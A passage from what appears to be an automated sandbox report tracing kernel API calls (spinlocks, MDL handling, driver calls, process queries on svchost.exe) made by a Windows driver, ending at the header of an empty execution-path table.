| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ff6 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a763a6c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002c852370, ret_val_unk_out = 0xffffe0003c8359e0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c8359e0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c8359e0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002c852570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002c852528, Handle_out = 0xffffffff800010a0, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010a0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010a0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff800010a0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ff5 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002c852370, ret_val_unk_out = 0xffffe0003c8359e0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c8359e0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c8359e0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c5f7410 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002c852570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002c852528, Handle_out = 0xffffffff80000c80, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000c80, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000c80, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000c80, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47fe8 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a779d0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002c852370, ret_val_unk_out = 0xffffe0003b7a1ad0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003b7a1ad0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b7a1ad0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002c852570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002c852528, Handle_out = 0xffffffff80000ff8, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ff8, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ff8, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000ff8, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47fe7 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a78841c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002c852370, ret_val_unk_out = 0xffffe0003b7a1ad0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003b7a1ad0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b7a1ad0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b0c28d0, Irp_unk_out = 0xffffe0003b0c28d0, ret_val_out = 0x103 |
Execution Path #186 (length: 171, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 171 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
